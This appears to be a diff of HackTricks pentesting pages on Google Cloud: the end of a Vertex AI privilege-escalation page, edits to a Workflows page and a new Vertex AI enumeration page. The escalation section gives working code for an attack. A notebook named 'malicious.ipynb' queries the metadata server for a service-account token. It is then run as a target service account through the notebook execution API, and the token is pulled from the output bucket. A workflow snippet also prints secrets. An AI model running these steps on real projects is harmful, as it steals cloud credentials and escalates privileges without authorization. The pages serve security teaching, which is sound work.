        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4,
  "nbformat_minor": 5
}
EOF
# Upload to GCS
gsutil cp malicious.ipynb gs://<your-bucket>/malicious.ipynb
```
</details>
<details>
<summary>Execute notebook with target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="<project-id>"
REGION="us-central1"
TARGET_SA="<target-sa>@<project-id>.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
```
</details>
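If a direct connection back is not possible, the executed notebook (including the token printed in its output cells) is written to the configured `gcsOutputUri`, so it can simply be retrieved from the bucket once the job finishes (bucket and file names below are placeholders):

<details>

<summary>Retrieve the token from the executed notebook output</summary>

```bash
# Find and download the executed notebook written to the output URI
gsutil ls -r gs://<your-bucket>/output/
gsutil cp "gs://<your-bucket>/output/<executed-notebook>.ipynb" .

# The token appears in the notebook's output cells
grep -o '"access_token[^,]*' "<executed-notebook>.ipynb"
```

</details>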
## References
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,6 +18,8 @@ It's possible to find the documentation of the connectors. For example, this is
And here you can find an example of a connector that prints a secret:
<details><summary>Workflow YAML configuration to access secrets</summary>
```yaml
main:
params: [input]
@@ -33,8 +35,12 @@ main:
return: "${str_secret}"
```
</details>
Update from the CLI:
<details><summary>Deploy and execute workflows from CLI</summary>
```bash
gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
@@ -60,6 +66,8 @@ gcloud workflows executions list <workflow-name>
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
```
</details>
> [!CAUTION]
> You can also check the output of previous executions to look for sensitive information
@@ -74,33 +82,37 @@ According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate
#### Oauth

<details><summary>Workflow HTTP request with OAuth token</summary>

```yaml
- step_A:
    call: http.post
    args:
        url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
        auth:
            type: OAuth2
            scopes: OAUTH_SCOPE
```

</details>

#### OIDC

<details><summary>Workflow HTTP request with OIDC token</summary>

```yaml
- step_A:
    call: http.get
    args:
        url: https://us-central1-project.cloudfunctions.net/functionA
        query:
            firstNumber: 4
            secondNumber: 6
            operation: sum
        auth:
            type: OIDC
            audience: OIDC_AUDIENCE
```

</details>

### `workflows.workflows.update` ...
With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks.

View File

@@ -0,0 +1,271 @@
# GCP - Vertex AI Enum
{{#include ../../../banners/hacktricks-training.md}}
## Vertex AI
[Vertex AI](https://cloud.google.com/vertex-ai) is Google Cloud's **unified machine learning platform** for building, deploying, and managing AI models at scale. It combines various AI and ML services into a single, integrated platform, enabling data scientists and ML engineers to:
- **Train custom models** using AutoML or custom training
- **Deploy models** to scalable endpoints for predictions
- **Manage the ML lifecycle** from experimentation to production
- **Access pre-trained models** from Model Garden
- **Monitor and optimize** model performance
### Key Components
#### Models
Vertex AI **models** represent trained machine learning models that can be deployed to endpoints for serving predictions. Models can be:
- **Uploaded** from custom containers or model artifacts
- Created through **AutoML** training
- Imported from **Model Garden** (pre-trained models)
- **Versioned** with multiple versions per model
Each model has metadata including its framework, container image URI, artifact location, and serving configuration.
#### Endpoints
**Endpoints** are resources that host deployed models and serve online predictions. Key features:
- Can host **multiple deployed models** (with traffic splitting)
- Provide **HTTPS endpoints** for real-time predictions
- Support **autoscaling** based on traffic
- Can use **private** or **public** access
- Support **A/B testing** through traffic splitting
#### Custom Jobs
**Custom jobs** allow you to run custom training code using your own containers or Python packages. Features include:
- Support for **distributed training** with multiple worker pools
- Configurable **machine types** and **accelerators** (GPUs/TPUs)
- **Service account** attachment for accessing other GCP resources
- Integration with **Vertex AI Tensorboard** for visualization
- **VPC connectivity** options
#### Hyperparameter Tuning Jobs
These jobs automatically **search for optimal hyperparameters** by running multiple training trials with different parameter combinations.
#### Model Garden
**Model Garden** provides access to:
- Pre-trained Google models
- Open-source models (including Hugging Face)
- Third-party models
- One-click deployment capabilities
#### Tensorboards
**Tensorboards** provide visualization and monitoring for ML experiments, tracking metrics, model graphs, and training progress.
### Service Accounts & Permissions
By default, Vertex AI services use the **Compute Engine default service account** (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`), which has **Editor** permissions on the project. However, you can specify custom service accounts when:
- Creating custom jobs
- Uploading models
- Deploying models to endpoints
This service account is used to:
- Access training data in Cloud Storage
- Write logs to Cloud Logging
- Access secrets from Secret Manager
- Interact with other GCP services
### Data Storage
- **Model artifacts** are stored in **Cloud Storage** buckets
- **Training data** typically resides in Cloud Storage or BigQuery
- **Container images** are stored in **Artifact Registry** or Container Registry
- **Logs** are sent to **Cloud Logging**
- **Metrics** are sent to **Cloud Monitoring**
### Encryption
By default, Vertex AI uses **Google-managed encryption keys**. You can also configure:
- **Customer-managed encryption keys (CMEK)** from Cloud KMS
- Encryption applies to model artifacts, training data, and endpoints
### Networking
Vertex AI resources can be configured for:
- **Public internet access** (default)
- **VPC peering** for private access
- **Private Service Connect** for secure connectivity
- **Shared VPC** support
### Enumeration
```bash
# List models
gcloud ai models list --region=<region>
gcloud ai models describe <model-id> --region=<region>
gcloud ai models list-version <model-id> --region=<region>
# List endpoints
gcloud ai endpoints list --region=<region>
gcloud ai endpoints describe <endpoint-id> --region=<region>
gcloud ai endpoints list --list-model-garden-endpoints-only --region=<region>
# List custom jobs
gcloud ai custom-jobs list --region=<region>
gcloud ai custom-jobs describe <job-id> --region=<region>
# Stream logs from a running job
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
# List hyperparameter tuning jobs
gcloud ai hp-tuning-jobs list --region=<region>
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>
# List model monitoring jobs
gcloud ai model-monitoring-jobs list --region=<region>
gcloud ai model-monitoring-jobs describe <job-id> --region=<region>
# List Tensorboards
gcloud ai tensorboards list --region=<region>
gcloud ai tensorboards describe <tensorboard-id> --region=<region>
# List indexes (for vector search)
gcloud ai indexes list --region=<region>
gcloud ai indexes describe <index-id> --region=<region>
# List index endpoints
gcloud ai index-endpoints list --region=<region>
gcloud ai index-endpoints describe <index-endpoint-id> --region=<region>
# Get operations (long-running operations status)
gcloud ai operations describe <operation-id> --region=<region>
# Test endpoint predictions (if you have access)
gcloud ai endpoints predict <endpoint-id> \
--region=<region> \
--json-request=request.json
# Make direct predictions (newer API)
gcloud ai endpoints direct-predict <endpoint-id> \
--region=<region> \
--json-request=request.json
```
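The `request.json` payload depends entirely on the deployed model's input schema; a minimal sketch for a generic model (the `instances` content is a placeholder to adapt to the target):

```bash
# Hypothetical prediction request body; adjust "instances" to the model's expected format
cat > request.json <<'EOF'
{
  "instances": [
    {"feature_1": 1.0, "feature_2": "value"}
  ]
}
EOF

gcloud ai endpoints predict <endpoint-id> --region=<region> --json-request=request.json
```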
### Model Information Gathering
```bash
# Get detailed model information including versions
gcloud ai models describe <model-id> --region=<region>
# Check specific model version
gcloud ai models describe <model-id>@<version> --region=<region>
# List all versions of a model
gcloud ai models list-version <model-id> --region=<region>
# Get model artifact location (usually a GCS bucket)
gcloud ai models describe <model-id> --region=<region> --format="value(artifactUri)"
# Get container image URI
gcloud ai models describe <model-id> --region=<region> --format="value(containerSpec.imageUri)"
```
### Endpoint Details
```bash
# Get endpoint details including deployed models
gcloud ai endpoints describe <endpoint-id> --region=<region>
# Get the display name of the first deployed model
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(deployedModels[0].displayName)"
# Get service account used by endpoint
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(deployedModels[0].serviceAccount)"
# Check traffic split between models
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(trafficSplit)"
```
### Custom Job Information
```bash
# Get job details including command, args, and service account
gcloud ai custom-jobs describe <job-id> --region=<region>
# Get service account used by job
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].serviceAccount)"
# Get container image used
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].containerSpec.imageUri)"
# Check environment variables (may contain secrets)
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.workerPoolSpecs[0].containerSpec.env)"
# Get network configuration
gcloud ai custom-jobs describe <job-id> --region=<region> --format="value(jobSpec.network)"
```
### Access Control
```bash
# Note: IAM policies for individual Vertex AI resources are managed at the project level
# Check project-level permissions
gcloud projects get-iam-policy <project-id>
# Check service account permissions
gcloud iam service-accounts get-iam-policy <service-account-email>
# Check if endpoints allow unauthenticated access
# This is controlled by IAM bindings on the endpoint
gcloud projects get-iam-policy <project-id> \
--flatten="bindings[].members" \
--filter="bindings.role:aiplatform.user"
```
### Storage and Artifacts
```bash
# Models and training jobs often store artifacts in GCS
# List buckets that might contain model artifacts
gsutil ls
# Common artifact locations:
# gs://<project>-aiplatform-<region>/
# gs://<project>-vertex-ai/
# gs://<custom-bucket>/vertex-ai/
# Download model artifacts if accessible
gsutil -m cp -r gs://<bucket>/path/to/artifacts ./artifacts/
# Check for notebooks in AI Platform Notebooks
gcloud notebooks instances list --location=<location>
gcloud notebooks instances describe <instance-name> --location=<location>
```
### Model Garden
```bash
# List Model Garden endpoints
gcloud ai endpoints list --list-model-garden-endpoints-only --region=<region>
# Model Garden models are often deployed with default configurations
# Check for publicly accessible endpoints
```
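To test whether an endpoint can be reached without credentials, compare a prediction request with and without an access token (a sketch; a locked-down endpoint should return 401/403 for the unauthenticated call):

```bash
ENDPOINT_URL="https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/endpoints/<endpoint-id>:predict"

# Unauthenticated request (expected to fail with 401/403 on a properly protected endpoint)
curl -s -X POST "$ENDPOINT_URL" \
  -H "Content-Type: application/json" \
  -d '{"instances": [{"data": "test"}]}'

# Authenticated request for comparison
curl -s -X POST "$ENDPOINT_URL" \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  -d '{"instances": [{"data": "test"}]}'
```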
### Privilege Escalation
In the following page, you can check how to **abuse Vertex AI permissions to escalate privileges**:
{{#ref}}
../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
{{#endref}}
## References
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
{{#include ../../../banners/hacktricks-training.md}}